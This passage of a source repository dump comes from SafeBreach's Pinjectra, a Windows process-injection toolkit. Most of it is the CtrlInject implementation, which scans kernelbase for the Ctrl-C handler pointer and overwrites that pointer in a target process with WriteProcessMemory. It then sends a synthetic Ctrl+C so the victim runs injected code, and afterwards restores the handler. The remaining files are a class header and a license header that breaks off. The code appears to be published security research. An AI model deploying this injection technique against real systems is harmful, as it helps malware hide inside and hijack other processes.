18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | // Standard Include's
32 | #include
33 |
34 | // Local Include's
35 | #include "CtrlInject.h"
36 |
37 | CodeViaCtrlInject::~CodeViaCtrlInject()
38 | {
39 | }
40 |
41 | boolean CodeViaCtrlInject::inject(DWORD pid, DWORD tid) {
42 | DWORD process_list[2];
43 | DWORD process_count;
44 | DWORD parent_id;
45 | RUNTIME_MEM_ENTRY* result;
46 | HANDLE h;
47 | void* encoded_addr = NULL;
48 | INPUT ip;
49 | MODULEINFO modinfo;
50 | int size;
51 | HWND hWindow;
52 |
53 | NTSTATUS(*PRtlEncodeRemotePointer)(
54 | _In_ HANDLE ProcessHandle,
55 | _In_ PVOID Pointer,
56 | _Out_ PVOID * EncodedPointer
57 | ) = (NTSTATUS(*)(
58 | _In_ HANDLE ProcessHandle,
59 | _In_ PVOID Pointer,
60 | _Out_ PVOID * EncodedPointer
61 | )) GetProcAddress(GetModuleHandleA("ntdll"), "RtlEncodeRemotePointer");
62 |
63 | HMODULE kernelbase = GetModuleHandleA("kernelbase");
64 | GetModuleInformation(GetCurrentProcess(), kernelbase, &modinfo, sizeof(modinfo));
65 | size = modinfo.SizeOfImage;
66 | char* kernelbase_DefaultHandler = (char*)memmem(kernelbase, size, "\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9); // sub rsp,28h; mov ecx,0C000013Ah (STATUS_CONTROL_C_EXIT)
67 | __int64 encoded = (__int64)EncodePointer(kernelbase_DefaultHandler);
68 | char* kernelbase_SingleHandler = (char*)memmem(kernelbase, size, &encoded, 8);
69 |
70 | process_count = GetConsoleProcessList(process_list, 2);
71 | if (process_count < 2)
72 | {
73 | // "Oops, process_count for the console < 2
74 | return false;
75 | }
76 |
77 | if (process_list[0] != GetCurrentProcessId())
78 | parent_id = process_list[0];
79 | else
80 | parent_id = process_list[1];
81 |
82 | FreeConsole();
83 | AttachConsole(pid);
84 | hWindow = GetConsoleWindow();
85 | FreeConsole();
86 | AttachConsole(parent_id);
87 |
88 | result = this->m_memwriter->write(pid, tid);
89 |
90 | CloseHandle(result->process);
91 |
92 | h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
93 |
94 | (*PRtlEncodeRemotePointer)(h, result->addr, &encoded_addr);
95 | WriteProcessMemory(h, kernelbase_SingleHandler, &encoded_addr, 8, NULL);
96 |
97 | ip.type = INPUT_KEYBOARD;
98 | ip.ki.wScan = 0;
99 | ip.ki.time = 0;
100 | ip.ki.dwExtraInfo = 0;
101 | ip.ki.wVk = VK_CONTROL;
102 | ip.ki.dwFlags = 0; // 0 for key press
103 | SendInput(1, &ip, sizeof(INPUT));
104 | Sleep(100);
105 | PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
106 |
107 | // release the Ctrl key
108 | Sleep(100);
109 | ip.type = INPUT_KEYBOARD;
110 | ip.ki.wScan = 0;
111 | ip.ki.time = 0;
112 | ip.ki.dwExtraInfo = 0;
113 | ip.ki.wVk = VK_CONTROL;
114 | ip.ki.dwFlags = KEYEVENTF_KEYUP;
115 | SendInput(1, &ip, sizeof(INPUT));
116 |
117 | // Restore the original Ctrl handler in the target process
118 | (*PRtlEncodeRemotePointer)(h, kernelbase_DefaultHandler, &encoded_addr);
119 | WriteProcessMemory(h, kernelbase_SingleHandler, &encoded_addr, 8, NULL);
120 |
121 | return true;
122 | }
123 |
--------------------------------------------------------------------------------
/Pinjector/CtrlInject.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Standard Include's
34 | #include
35 | #include
36 | #include
37 |
38 | // Local Include's
39 | #include "ExecutionTechnique.h"
40 | #include "WritingTechniques.h"
41 |
42 | extern "C"
43 | {
44 | #include "memmem.h"
45 | }
46 |
47 | // Classes
48 | class CodeViaCtrlInject :
49 | public ExecutionTechnique
50 | {
51 | public:
52 | CodeViaCtrlInject(SimpleMemoryWriter* memwriter)
53 | :m_memwriter(memwriter) { }
54 | ~CodeViaCtrlInject();
55 |
56 | // Methods
57 | boolean inject(DWORD pid, DWORD tid);
58 |
59 | protected:
60 | // Members
61 | SimpleMemoryWriter* m_memwriter;
62 | };
63 |
64 |
--------------------------------------------------------------------------------
/Pinjector/DynamicPayloads.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Standard Include's
34 | #include